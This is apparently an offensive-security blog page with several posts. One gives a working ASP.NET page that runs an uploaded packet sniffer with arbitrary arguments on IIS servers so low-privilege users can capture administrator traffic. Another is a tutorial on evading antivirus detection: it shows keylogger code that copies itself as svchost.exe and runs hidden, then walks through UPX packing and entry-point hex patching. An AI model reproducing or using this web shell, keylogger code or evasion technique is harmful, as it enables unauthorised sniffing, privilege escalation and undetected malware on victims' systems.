9 Oct

bug in winpcap

Posted by daphne in Exploits / BUG Decryption |

BUG IN WINPCAP

I feel God Is here .

Hi dear , I’M Daphne , My job is Penetration Tester (Pen-Tester) , I write About This Subject and Around  .

Pent-Test is Cool & funny job with hacking interesting subject.

anyway ….

I use winpcap 4.2(last version)

http://www.winpcap.org/install/default.htm

what is winpcap :

WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture.

WinPcap consists of a driver, that extends the operating system to provide low-level network access, and a library that is used to easily access the low-level network layers. This library also contains the Windows version of the well known libpcap Unix API.

How to load winpcap in windows :

BUG :

when Administrator or Other Power users in windows summon winpcap driver (such as wireshake or nmap or cain or …) driver loaded !

but , when close program , winpcap driver still in memory , That’s it .

when driver not unload , Guest user or IIS_User can load this driver in kernel level , and SNNIFF Admin Packet in administrator Level or get  Administrator privilege .

I sniff packet with win dump in guest mod .
http://www.winpcap.org/windump/install/default.htm

Ok , I write This little tools for iis7 – iis6 in windows 2003 – 2008 :

usage :

load wireshake or other tool that run winpcap driver .

rename windump.exe to packet.exe and upload near winpcap.aspx and run it .

and then you can sniffed packed in 1.txt /

winpcap.aspx

<%@ Page Language=”VB” Debug=”true” %>
<%@ import Namespace=”system.IO” %>
<%@ import Namespace=”System.Diagnostics” %>
<script runat=”server”>
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
‘ Change Path Of tcpdump
Dim myProcessStartInfo As New ProcessStartInfo(Server.MapPath(”packet.exe”))
myProcessStartInfo.UseShellExecute = False
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xCmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,”<”,”&lt;”)
mystring=replace(mystring,”>”,”&gt;”)
result.text= vbcrlf & “<pre>” & mystring & “</pre>”
End Sub</script>
<form runat=”server”>
New Method Of Packet Sniffing In web whith Public Accesss .
<br />
This Program Run is AS IS !
<strong><span class=”style-2″>Serve rip</span></strong> :<span class=”style-2″>  <%=request.ServerVariables(”LOCAL_ADDR”)%></span><br>
<strong><span class=”style-2″>Machine Name</span></strong> :<span class=”style-2″> <%=Environment.MachineName%></span><br>
<strong><span class=”style-2″>Network Name</span></strong> :<span class=”style-2″> <%=Environment.UserDomainName.ToString()%></span><br>
<strong><span class=”style-2″>User Name</span></strong> :<span class=”style-2″> <%=Environment.UserName%></span> <br>
<strong><span class=”style-2″>OS Version</span></strong> :<span class=”style-2″> <%=Environment.OSVersion.ToString()%></span><br>
<strong><span class=”style-2″>IIS Version</span></strong> :<span class=”style-2″> <%=request.ServerVariables(”SERVER_SOFTWARE”)%></span><br>
<strong><span class=”style-2″>HTTPS</span></strong> <span class=”style-2″>: <%=request.ServerVariables(”HTTPS”)%></span><br>
</tr>
<br />
Tested On Windows vista , IIS7 .
<br />
<h5>Discover By “DAPHNE IDEA SECURITY ” .</h5>
<br />
Exp: -i 6 -w “c:\windows\temp\packet.txt”
<hr />
<asp:Label id=”L_p” style=”COLOR: #0000ff” runat=”server” width=”80px”>TCP DUMP PATH:</asp:Label>
<br />
<label><%=Server.MapPath(”packet.exe”)%></label>
</asp:TextBox>
<br />
<asp:Label id=”L_a” style=”COLOR: #0000ff” runat=”server” width=”80px”>Arguments</asp:Label>
<asp:TextBox id=”xcmd” style=”BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid” runat=”server” Width=”300px”>-D</asp:TextBox>
<br />
<br />
<asp:Button id=”Button” style=”BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #000000″ onclick=”runcmd” runat=”server” Width=”100px” Text=”DUMP PAcket”></asp:Button>
<p>
<asp:Label id=”result” style=”COLOR: #0000ff” runat=”server”></asp:Label>
</p>
</form>

this tools is sample .

in future i speak about how to Privilege escalation with kartoffell tools in drivers .;)

9 Oct

undetect malwares , virues from anti-virues

Posted by MrXX in reversing |

In the name of god
Hi, I’m MrXX and in this blog I want to talk about the some coding, reversing and more…

And please don’t post the some shit comment in the index, because we going to delete it
And please don’t spam us with Noob question, cause they don’t answer the Noob
And the last think sorry about the English, cause I can’t even talk in English (I just can read) by the way

In the first, I want to talk about some reversing (I tired and seek and my mind wasn’t work correctly)
This is not my tut by I search over the web 2 or 3 day to find the best way & I think this is best way (original tut by : Kenny)

To undetected the malware from antivirus

First we need tools
1-Hex editor: I use the HIEW (not the 32 bit ver)
2-PE Tools: I use the PE Tools v1.5
3-UPX
4-Cracker call this BRAIN (I think I got it by I can’t give it to u, go find yours)  :)
If u don’t know what is those tools and how u can use it: I tell u go f.u.c.k yourself and please don’t read this
Ok , I read the magic world and dorooooororooooooo : oh my god magic happen :) , my f.u.c.k.ing malware undetected , ha ha ha ha I’m kidding there is no magic & magic is just some shit , every think in this whole world have the logical reason (I don’t believe magic)
Make malware (Trojan,rootkit,virus,…) undetected just have some little ways and if u like it I tell all the possible way to make our malware tools undetected ,but I tell it 1 by 1 , and if I see some , kididi mididi tnx in the comment I tell the next magic world
Let’s pull the chair close to your PC and get started
I wrote my own keylogger many year ago , but god DAMN antivirus known my own private keylogger as the probably unknown NewHeur_PE virus

And nod want to submit this to them Database :(

Oh my god how could this happen :) , don’t worry about that I tell u next time how u can bypass the stupid antivirus with some cryptography
In this time I want to undetected the binary file (u can use this to make all the binary malware u don’t have them source)
See the virustotal result: that’s nasty

And u will see, some of antivirus detect the malware and some of them don’t detected because is this private
Malware detected because of some of the line like:

Dim ModuleName As String, FileName As String, hInst As Long
ModuleName = String$(128, Chr$(0))
hInst = GetWindowWord(Me.hwnd, GWW_HINSTANCE)
ModuleName = Left$(ModuleName, GetModuleFileName(hInst, ModuleName, Len(ModuleName)))

If CheckPath(SystemDir + “svchost.exe”) = False Then
FileCopy ModuleName, SystemDir + “svchost.exe”
ShellExecute Me.hwnd, “open”, SystemDir + “svchost.exe”, vbNullString, vbNullString, SW_HIDE
End
End If

Or
Because the uses of those api

Private Declare Function SetWindowsHookEx Lib “user32″ Alias “SetWindowsHookExA” (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long
Private Declare Function UnhookWindowsHookEx Lib “user32″ (ByVal hHook As Long) As Long
And…

Ok later we crypt those command and use the API very cleverly to bypass the Noob antivirus
Oh we talk some much let’s back to the undetected part
First we pack the file with UPX (do something else) and we open our packed file with the PE Tools

Open file and get some info about the entrypoint

Entry Point: 0000AD20
Image Base: 00400000

Now we open the packed file with HIEW in the disassemble mode we going to entry point
U will see some entry like this

This is the entry that was UPX make
When we scroll done some line we will see zero space, we use this for hexing our tool
Place those codes into the zero space
Use the edit F3/F2 command

push        00040AD20   <— push OEP
push        eax
pushfd                   <—for tricking AVP
pushad                    <—for tricking AVP
call       .000025154  <—– call for Ret 28h
retn 00028

The address depend on your system and those are not the static

After that , save the progress
And again add 2 line

INC ECX  <— Counter up
Loop 000022D9

Save them again
Ok our hexing finish , now we must go and change our entry point to the new entry
We open the PE Tools again change the entry point to the new value

OEP = entry address – imagebase(400000)

New entry:0040AED9

After that we unpack the file with UPX an it must be undetected from AV
This method called: changing the entry point for undetected the malware
That’s the nice way but we got the easy way to like Pack the file , hexing the Signature of the file and  …

In the next post I talk about ElF File’s And Reversing
Good Luck
MrXX

9 Oct

bypass antivirus with string crypting

Posted by MrXX in reversing |

yeah , as i say in the last post

in this tut you will learn to bypass some of the sutpid god DAMN antivirus with string Encrypt/Decrypt trick

DL Link

the next post will be : Undetect the malware from AV

9 Oct

another start

Posted by shahin in news |

here is another info-sec blog via some security researchers we are really busy in these days in our small labs  but we hope can have efficiency result and update this blog with some interesting content . we are trying update this blog everyday and finally we accept all of your discretion and comments .

labs

labs

Newer Entries »
Get Adobe Flash playerPlugin by wpburn.com wordpress themes